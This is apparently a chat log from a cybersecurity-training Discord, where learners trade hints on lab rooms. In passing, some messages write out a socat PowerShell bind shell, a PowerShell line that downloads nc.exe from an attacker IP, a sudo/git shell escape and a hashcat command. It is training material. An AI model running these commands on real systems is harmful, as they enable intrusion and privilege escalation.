I think for that one, you could even catch it with nc, but not sure anymore.
But since you asked about meterpreter, I suggest you use msfconsole to catch the shell, since meterpreter is a metasploit thing

okay thanks

Gave +1 Rep to @left thunder

Hello everyone,

I'm having a little trouble with webenum1 and gobuster vhost task 6.

With a little help I was able to do the -append-domain to get the vhosts correctly, but now I don't know how to do a dir scan for the flag in the vhosts. I was told I will need to edit my /etc/hosts file but I don't know what the IP address is of the 2 vhosts I want to scan.

Any help would be appreciated... how do I find/get the IP addresses of the vhosts if I need to add them to my /etc/hosts file?

gobuster vhost is the command with some parameters. It's part of gobuster.

I think I found an answer/hint that I'll try.

to edit /etc/hosts

fSorry, I thought I mentioned gobuster in my initial post.

I'm still a little new and learning... I'm not sure what you were trying to ask about what is a vhost then. I understand that it means virtual host and that it's not just a gobuster thing but in this context I'm not sure what you're asking.

It looks like the edit I made to the /etc/hosts file is working now.

I have a little more to learn and research with the /etc/hosts file and adding the vhost names to the same IP.

like how/why:

xxx.xxx.xxx.xxx webenum.thm extra1.webenum.thm extra2.webenum.thm

works. I get the "extras" are the virtual hosts. Would *.webenum.thm still work instead of having to spell out all the vhosts? I guess I can try it out and test it for myself.

HI I need help with the what the shell room https://tryhackme.com/room/introtoshells#
I am using the kali web based machine on THM
I am on task 13 I am having trouble with getting bind shells on the windows machine:

I have successfully obtained a reverse-shell with netcat and socat
I uploaded a webshell which I used to get the reverse shell with nc and socat
But when I try to use this command(on my current revershell) socat TCP-L:4444 EXEC:powershell.exe,pipes on the reverseshell when I run this command TCP:<target ip>:<4444> - i get socat[22548] E connect(5, AF=2 10.10.12.59:4444, 16): Connection refused
If I try the same command url encoded for the webshell i uploaded I get the same response when I try to connect back

Netcat:
When I run a listener on my kali machine using nc -nlvp 4444 and attempt to connect back to this via the reverse shell i had previously caught I do not receive the connection back

I also need help with "Create a 64bit Windows Meterpreter shell using msfvenom and upload it to the Windows Target. Activate the shell and catch it with multi/handler" I am able to do this successfully with php version of this payload but I am curious how I am supposed to do it with .exe version of the payloads

any help is appreciated thanks in advance!

I'm having trouble with Penetration Fundamentions. It's asking "What testing process" but answers like low-level, high-level, Grey/black/white doesn't seem to be resolving it

Look at the number of * in the answer box.

oh my... i was using a hyphen... you are right and I should read more caefully. Thanks Scrubz!

Hi I am trying to complete the THM ice room and it said that the firewall has been disabled but still nmap output says ports are in filtered state

can anyone tell me why this is happening

─(venky㉿venky)-[~/Desktop]
└─$ sudo nmap -sS -Pn -A -p8000 -oN m.txt 10.10.200.27
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-13 16:11 EDT
Nmap scan report for 10.10.200.27
Host is up (0.00014s latency).

PORT STATE SERVICE VERSION
8000/tcp filtered http-alt
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Actiontec MI424WR-GEN3I WAP, DD-WRT v24-sp2 (Linux 2.4.37), Linux 3.2, Linux 4.4, Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 0.09 ms 192.168.244.2
2 ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

hello, I had a question on the room metasploit meterpreter

search -f secrets.txt

Everytime I run that command it just seems to hang. Is this command supposed to be pretty slow?

I looked up a few guides and the command is correct and everything else is pretty smooth in this room. Didnt know how heavy this module was 🙂

and after 3 attempts it worked perfectly nevermind lol

Are you using the AttackBox or your own VM? I’ve only had slowdowns when I was using the AttackBox because I was too lazy to turn on my own VM lol

attackbox... 😛 which is slow as molases and also has outdated everything

I thought we were supposed to get better VM's when we subscribe? I might be wrong there

I never bothered to check the RAM on them, but I think you may be right either way, for me it slowdowns when I’m running gobuster or other things like that, but that’s given

yeah; I cant imagine how much it would really cost for us paying customers to get VM's that at the very least have 8 gb of ram but I guess If it furstrates me enough I could always spin up my own VM

For the hashing - crypto 101 room I am supposed to go and crack a hash using online methods. I tried using crackstation.com, but that did not work and I cannot find any other resources other than trying to use hashcat for the first time. Any help I can get would be apprciated.

Which Task are you on? Hashcat is relatively easy to use.

hashcat -m HASHMODE /hashfile.txt /wordlist.txt

You can find hash modes here:
https://hashcat.net/wiki/doku.php?id=example_hashes

Hello everyone

Im.new here

Nice meeting everyone

ayoo

hey. Anyone available who can help me with the room set? I'm on the last step.

I already edited the exploit to run commands. I use chisel to forward the port. I tested the cmd oneliner with my user - but the exploit doesn't execute

this is what metasploit shows me:

[*] 127.0.0.1:2805 - Sending host info to 127.0.0.1:2805
[*] 127.0.0.1:2805 - Executing Windows RCE CMD for windows/x64/exec
[*] 127.0.0.1:2805 - Sending malicious handshake to 127.0.0.1:2805
[*] Exploit completed, but no session was created.

it worked. 😄

Gotcha, thank you. I will try that out and I am sure it will work. I think the room wanted me to use that specific website and it was not working so I had to find out another way.

https://tryhackme.com/room/networkservices# - Exploiting SMB. Last part. Can't find smb.txt at all. Can anyone provide hints?

Where are you looking for the smb.txt? On the SMB share or through SSH?

smb share, I'll try ssh

I've tried to login to the ssh using the rsa key but it's still asking me for a password which I'm having a hard time finding

Can you show me a screenshot or the command you used to connect to SSH?

You changed the permissions of the key right?

Apparently so. Originally I was using "John Cactus" instead of just "cactus@ip" and once I did that it gave me an incorrect format thing so I looked up a walkthrough

Hi, i was studying the room "linux privilege escalation" and in the last where the escalatin is done with NFS, am not able to execute the C file, that i upload in it.
It giving the error
./exp: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./exp)`

https://tryhackme.com/room/linprivesc
This is the room, and its the second last task

I tried to change the code with this above version, but still the error was their.
The initial c code was same the one mentioned in the lesson

It good now.
and you mean live of the land within nfs?

but escalation within system and using nfs is different right.
The task was to escalate through nfs to the server

ok i understand 🤝

holla, i could use a hint on takeover, i tried subdomain enum with fuzz but so far nothing, also tried some manual guesses. dirbuster is also not giving much interesting back? am i missing something?

You didn’t find any subdomain while fuzzing ?

Nope

Tried lepus as well, which said it found 1 but it is unresolved

And doesnt seem to give any result

Can you show us your command for fuzz ?

hey, I'm doing Anonymous Room and I don't know why but I can't get a connection back from my reverse shell. I don't know if its because of that, but I deleted the clean.sh and then uploaded a new one with a bash reverse shell script. But I still have no connection

hello i have a big problem on the room "Hackpark"

we have to login in a login page

i know the username and the password

im sure about password and username

but it didnt work

So you've found the username and bruteforced the password for task 2?

Yes

hi can help me with throwback-timekeeper

i cant get a shell bk

But it won't let you login with the found uname and pw?

Are you sure your hydra command is correct? Could be that the message it's looking or is wrong so it's giving you correct password because it can't find the text you specified

Yes and im sure about password and username

Can i send you the id in private message ?

Sure

ok so im doing the Looking Glass CTF from the wonderland series and im kinda stuck at the nmap scan where im only getting loads of unnecessarily open ports with ssh (i know its intentional) ... so any hints regarding that one im just stuck

i tried different nmap scan like Xmas ... i even utilized --scanflags and scanned with some different combinations of packets sent

https://tryhackme.com/room/lookingglass thats the room

I'm doing the file inclusion room and I'd like a hint if possible. I'm closish to finishing this third challenge

do we have to use burpsuite for challenge 3? I'm trying to get this to work using inspect element and it's not playing nice

Yeah doing it in Burp is easier

I'm having issues getting burp to work, I've never used burp before

yeah burp can't find the box. I'm running burp via attackbox and it can't find the room vm

anybody can help w this

In Sakura room Task 5 question 3:
What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?
even when i put correct link is showing wrong answer please if someone has a link which is accepted as answer tell me

Copy the link with the md5 hash from the png available in the hint.

What do you mean exactly? Is the extension foxyproxy activated?

yeah I didn't know you had to have foxyproxy active.

it's fixed, I finished it a few days ago

Regarding Task 4- Manual Discovery - Content discovery - i am not sure where to look at to find the secret area. Any hints?

Hey wondering if someone could help me with this:
#room-hints message
and this:
#room-hints message

Pay close attaentions to the loc tag

Legeeeend

i dont know how to make the Q4 of Walking An Application

Pay attention to the last paragraph in the section, it explains it well

i got it, thanks

Brain is fried. Content discovery Manual discovery Task 6 . The flag i find does not work. Anyone passed this stage?

Yes. I got a different flag

Make sure you're actually going to the right page

You’re on about this one then… there’s hardly any flag on the source code😔…

hey have you solved this yet? The flag isn't in the source code

Nope. Genuinely trying to crack this to move on

Ping me when you re-try this 😄

why this is not working ?

Maybe the type of quotes you have that are quoting ' 'Username already exists ' '

Try these quotes maybe " "

Yeah

thanks

Well.. no luck so far

Did you try the long url?

i am planning to change my username, but how to know if my username that iam willing to change to, is already available?

Go to.

Http://www.tryhackme.com/p/*insertUserNameHere*

The /thm-framework-login one? Yes indeed

Did you read all the links?

getting a 404

Nobody has that username then.

oh ok, i misunderstood your statement. I though it was a whole link

ok gotcha, thank you

I retried all the source links and the main ‘static’ hyperlink. I feel it’s easier to find than i think

But i don’t have a clue

what about documentation?

i can't do this, i need help

Might want to show a screenshot of the command you used, as from that screenshot there is not much to see

this was to show me the name of users who already have an account

You have a typo in "urlencoded", best to use the copy paste clipboard to copy such long commands to the attackbox

https://media.discordapp.net/attachments/692456966802374687/921063860318924800/clipboard.gif

aaa thanks

I'm doing the Pickle Rick room but when I try to ping the machine I'm not getting any response but it's showing I'm connected with openvpn. Is this normal?

can you access site in browser

Let me check. I normally only do them in the boxes provided but trying to do it on my own VM. I'll try that now.

Yes, it open in my vm machine that I am connected to with openvpn. I can see the help morty page.

then it works. mihgt just you internet is bit slow or smth

I've done a ping scan and for example it just says 169 transmitted, 0 recieved.

If it try an nmap scan it says host seems down.

Will restarting the machine help?

can you ping -c 3 10.10.10.10

might do yes

I think I will have to restart it's strange that I can still see the page though but can't ping

try

I terminated the thm machine. I restarted my vmware kali and connected to the openvpn. I started the thm machine. I can view the picklerick web app in my machine but can't ping or nmap scan the ip address of the active machine. But it did let me ping scan the webapp when I use address rather than the IP address. Not sure if something is blocking stuff or a vmware issue or a issue on tryhackme side.

You can't ping all the machines.

I use vmware and encounter no issues.

Best bet would be to use this

!vpnscript

Been using the link that gives me a tag including the word ‘static’

Strange, works ok for me.

Can i private message you the tag i see?

No, if it's the same one you've sent that's fine.

Im not stuck, i know what I'm looking for, but the GPS thing is weirdly set up and Wigle isn't giving me results

This is from the OhSINT roon

annoying asf

can someone give me another hint for https://tryhackme.com/room/uploadvulns task 8

the server side filter wont accept php and the hint on it is Commands do not start with a "-". Just use the word itself.

Check out their Wikipedia page 😉

Bruh i was so sure they would have filtered out php5 too i didnt even try it

Thanks buddy. Took me 72 hours but glad i found it. Thanks for your help

Gave +1 Rep to @lucid junco

I am in the Corp room. I am stuck.

I have a jpg but do not know how to add it.

I am just typing the first steps.

System.Net.WebClient).Downloadfile('http://10.8.133.41.:8000/nc.exe', 'C:\Windows\System32\spool\drivers\color\nc.exe')" it says exception downloadfile with 2 arguments

never mind- I decided to type the command and see what happened. I got the text file with the flag. \Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 😃

At the authentication bypass Task 2 , the instructions doo not teach you how to create a file with a line of code..

More than likely this room was to be done after Linux fundamentals 1,2 and 3.

The task doesn't ask you for a line of code. Just a simple text file with the users you found

I get it. Thanks

Gave +1 Rep to @strong silo

Maybe I haven't understood your question correctly. You don't know how to create a file using the terminal or you thought that your file should contain some code inside?

Thank you, I'll remember that.

Gave +1 Rep to @lucid junco

Hi !
im actually doing the Wonderland box. i have access to the server via ssh, but now i'm stuck, so there is my question :
Do i need to know the Alice's world to pwd this box ?

or can it help to know the story ?can it be useful to know the story?

Where are you stuck?

has anyone got the ivpn.exe service to recompile and start on Osiris -appear to be stuck with getting the service to start

Does anyone have a hint for Linux Forensics Task5, i seem to be blind. i can't find the histsize in the .bashrc file

nvm was looking in the wrong file

It’s nuts how much hand holding i need.. Task 4 Authentication bypass. I created my username , my account but no support ticket leading me to Robert. I tried to include my username in the code in different locations (to no avail..)

Is there a junior Linux course included cause i just seem not to understand much?

Morning mate, it asks you to create a file. You mentioned that’s a file for my own records. Yet, i am including the names in the code but the query is aborted when i do this. 😯

Hi, thank for answer.
I'm actually stuck with Alice account. I didn't find the exploitation vector to pivoting through another user

Gave +1 Rep to @lucid junco

So you've logged in as Alice?

yes

will the website be usefull again ?

Ok, first thing I do when I login as a new user, is check what they can run.

sudo -l right ?

Bingo 😄

This is by far one of my favourite rooms.

hmm.. Thank you for the hiint. I've already check this command, but i will continue to investigate it !

Hi, May I know that have you gt the solution for this?

hi there, regarding outlookleak room

why the listeners doesn't work on my kali, and only work on attack machine

after uploading my own clean.sh file with the script, I just had to wait a bit for the job to execute the file and get the reverse shell conection back to my netcat listener

share a screenshot of the file you created and the command you tried to run to find possibles usernames

Yeah, it worked. The file should be replaced, instead i removed and uploaded the file. I believe replacing the file doesn't change the file permissions. Removing and uploading the file changes the permissions

Hi there..I need hint about how to proceed for Task1 in "WYWM Hackathon Aug 2021" room

I tried the network scan and tried the exploits also but not successful

currently stuck about how to proceed next

I see people adding graphics. How do you do this. I cannot figure that out?

in intro to c2 task 4 not sure my armitage ui isnt loading up for me ive done all the steps right

What do you mean by graphics?

screen shots

you need to verify to be able to send screenshots

!docs verify

hello,in room named "agent sudo", i knew it needs to change the UA,but how do I know if I need to change UA to a specific character?

is anybody there

Have you tried changing the UA to the one who posted or sent the message?

In the NetSec Challenge room, in the last question or challenge, can someone give a nudge on the type of scan to use? I've tried several combinations, but can't get it to work. There was one I have yet to try, but having issues finding a zombie host.

Is this the challenge to do a quiet nmap scan?

Yes, it is.

any hint for Devie room?

That room is best of using the attackbox.

Pyramid of pain Task 2 has a new hash. I Inputted the file name and does not like it. I have tried every way possible and I have even tried to look up the answer on Google. Can someone help?

what name you did put ?

X97M.Downloader.44710

Wait

sorry, i meant trojan.valyria/x97m

!docs verify

will help to show screenshots and will be easy to help

I also tried Trojan/Suspectcrc!PxYUFiQu

https://share.getcloudapp.com/JrupnlbY.

one sec. the task 2 and question is
Analyse the report associated with the hash ...

Yes

you did put that hash in search of virustotal

Yes

try look at Details tab 🙂

Purchase_Order 6862.xls?

try it...

It says that is incorrect

I found it. Sales_Receipt 5606.xls

🙂

Thank you!

np

Also, this is my first real discord chat.

I know that sounds weird.

!docs verify

to get conected

Thank you. I just connected

also #start-here is helpfull

I will check it out.

Please give a hint for Devie. I need help how can i send input to tigger eval() function.

any hint for Wonderland room?

Hi, I could use an hint for privilege escalation for the room LinuxAgency

When using the command of GTFOBIN: sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help

It's fixed is it because I didn't upgrade my shell anyone has idea if that could be the problem?

Which part are you stuck at?

@umbral umbra ⬆️ this message got sent in nearly all channels..... makes shadow not wanna answer the question

@alpine kestrel here

what does it mean

ah...

have you used burp suite in the past???

because that is probably easier then curl in this instance

im not good at it, only used proxy

yes i tried to ask chatGPT how to do it using burp

but it didn't work out, i lack experience

well first try and do a get request then capture that in burp... right click... click send to repeater... rightclick again.... select change method to post

and you should be able to handle it from there hopefully

or you can go through the burp rooms on tryhackme to learn this

i will try first then if it didn't work i will learn burp, thank u

Gave +1 Rep to @alpine kestrel

no problem

good luck and have fun

it worked, thanks again

Gave +1 Rep to @alpine kestrel

oh glad it worked.. good job on hacking the thingy code

help

challenge 3 in file inclusion is filtering numbers and slashes

idk how to bypass that filter

@jaunty elm
Hey hey, I've just finished the Inferno room, and I wonder how you made the auto-killer for TTY shells. Would you mind DMing me how? thanks :>

Gave +1 Rep to @jaunty elm

Hi, I'm working on the SQL injecion module (on Jr pentester path)

I don't understand how to do it..

(forget about it lol )

ima so dumb

Hello everyone. Im stuck on the nmap learning path

the question im stuck on is "How would you tell nmap to scan all ports?"

Kinda dumb I know but I cant seem to get it. Any hints would be greatly appreciated.

nvm I got it

somebody know how to make this challenger 3 ?

I am know, i saw somebody make by curl, but i want to make by http

i'm catching up

I've done this room but forgot and don't have a write-up for it

as I'm completing the room though, I can give you another hint:

||Hint: try different GET, POST, DELETE methods of request ||

||Perhaps the POST method?||

Hi guys

need help with Room Snort
when I try to enter in terminal sudo ./traffic-generator.sh the response is "command not found"

any hints?

Are you in the directory where ./traffic-generator.sh is in ?

Otherwise if you are not, you will need to declare the entire path

sorry

my stupidity

solved

@white salmon Thank for the hint

Gave +1 Rep to @slender kelp

Can someone please explain this https://tryhackme.com/room/linprivesc

I dont understand what it means when it says this privilege escallation vector is there not discoverable when enumerating files looking for SUID.

Does this mean it mean when looking for SUID vulnerabilities you wont be able to find capabilities vulnerabilities at the same time for just vim and its copy?

I am not sure why it is included in the capabilities section of the room

Sysinternals - Task 5 - TCPView
I think i found the answer but it doesn't fit the field. Please help me
||Microsoft Corporation||

You sure?

Thats apprently the right answer

!docs verify

verify, send a spoilerd screenshot

I found this answer. but the expected number of characters is different and it doesn't accept my answer
||https://www.talosintelligence.com/reputation_center/lookup?search=52.154.170.73#whois||

@trim haven

any ideas?

From what I understand, it says that it won't be discoverable due to the fact that when enumerating files with the SUID bit set, we run the command (or its variation): find / -user root -perm -4000 -exec ls ldb {} ; However, in the given vim example, the permissions were lrwxrwxrwx and -rwxr-xr-x. Thus, these will not be included in the result or command output.

well you can use -perm /4000 which will give you different results to a degree

what will be the answer in the fakebank quiz

I have answered $767.68 as fakebank.com shows. but it says wrong

That is the wrong answer. It's not asking for the balance.

then what

When you've transferred money to your account, go back to your bank account page. What is the answer shown on your bank balance page?

it shows 767.68

Can you kindly help me out

What is the answer shown on your bank balance page?

I got it thanks

thanks

Help

I don't get the question

Is it supposed to be where?

Yup

Can some Admin change it please since it's confusing ??

Is supposed to be where instead of how

read the part Example Scenario: there is answer

I already solved it, just the question was supposed to be When instead of How

No, it's supposed to be where

Which can also be "How"

??

How = where?

i don't get it

it's not necessarily to be updated but it makes more sense when it's "where"

Where did you learn to play the piano?
How did you learn to play the piano?

Two sentences swapping out how and where, with the context.

excuse my poor english

I Learnt English at school
I learnt English by talking to people

Same Concept here, just two different questions already

Can I have a hint for the OSWAP top 10 room, task 19. I'm looking at page source and not seeing anything.

google about the title of web page

oh

helll guys

im stuck at a question

i need tyour help

can anyoone herere help me

At the nmap tutorial, on task 4, Discovering Live Hosts, I put the correct answer for the first question, but it says that it is not correct. Does anyone know why???

What is the question?

What is the type of packet that computer1 sent before the ping?

and i put ARP Packet

can you link the room?

https://tryhackme.com/room/nmap01

Oh yeah, the type of packet, are you familiar with how ping works?

yes

What happens?

you send packets to see if the host is up or not

And what does the host do if it's up?

sent back

ack

Even if you look just above the question.

you should work out half your answer is correct, one half isn't.

aa okey

thank you